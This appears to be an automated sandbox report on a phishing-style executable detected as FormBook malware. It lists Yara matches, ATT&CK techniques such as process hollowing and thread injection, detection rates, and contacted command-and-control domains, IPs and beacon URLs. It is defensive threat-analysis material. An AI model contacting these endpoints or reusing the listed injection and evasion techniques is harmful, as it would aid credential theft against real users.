          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items23
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626150 Sample: Notificaci#U00f3n de pago.exe Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 31 www.triptoasiam.com 2->31 33 www.massage-rino.com 2->33 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 8 other signatures 2->47 11 Notificaci#U00f3n de pago.exe 3 2->11         started        signatures3 process4 file5 29 C:\...29otificaci#U00f3n de pago.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 Notificaci#U00f3n de pago.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.librevillegabon.com 104.195.7.239, 49764, 80 ESITEDUS United States 18->35 37 theguiriguide.com 192.0.78.25, 49761, 80 AUTOMATTICUS United States 18->37 39 4 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 WWAHost.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Notificaci#U00f3n de pago.exe21%VirustotalBrowse
          Notificaci#U00f3n de pago.exe41%ReversingLabsByteCode-MSIL.Trojan.FormBook
          Notificaci#U00f3n de pago.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.massage-rino.com0%VirustotalBrowse
          theguiriguide.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.comlvfetDm0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.founder.com.cn/cnG0%URL Reputationsafe
          http://www.sajatypeworks.comG0%Avira URL Cloudsafe
          http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.galapagosdesign.com/n0%Avira URL Cloudsafe
          http://www.fontbureau.comB.TTF?m0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y0?m0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/hm?0%Avira URL Cloudsafe
          http://www.fontbureau.comcom0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/6m0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sajatypeworks.come0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb0%Avira URL Cloudsafe
          http://www.sajatypeworks.comt0%URL Reputationsafe
          http://www.sajatypeworks.comt-bh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Zm0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.como)m0%Avira URL Cloudsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/)m0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          www.hkqhdq.com/d6fp/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cnnt0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Dm0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/20%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/cm60%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/qm(0%Avira URL Cloudsafe
          http://www.founder.com.cn/cne-dio0%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/~mQ0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Mm0%Avira URL Cloudsafe
          http://www.fontbureau.comsief0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.triptoasiam.com
          		162.0.216.71
          		truefalse
            		unknown
            www.massage-rino.com
            		38.40.251.97
            		truefalseunknown
            theguiriguide.com
            		192.0.78.25
            		truetrueunknown
            parkingpage.namecheap.com
            		198.54.117.212
            		truefalse
              		high
              www.librevillegabon.com
              		104.195.7.239
              		truetrue
                		unknown
                www.theguiriguide.com
                		unknown
                		unknowntrue
                  		unknown
                  www.team-ctctitleco.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.evertribute.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgbtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgbtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgbtrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.hkqhdq.com/d6fp/true
                      • Avira URL Cloud: safe
                      		low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.fontbureau.com/designersGNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comlvfetDmNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/?Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.html0Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers?Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.tiro.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.krNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnGNotificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comGNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sajatypeworks.comNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/nNotificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comB.TTF?mNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/Y0?mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/hm?Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comcomNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/6mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/Y0Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fonts.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comeNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
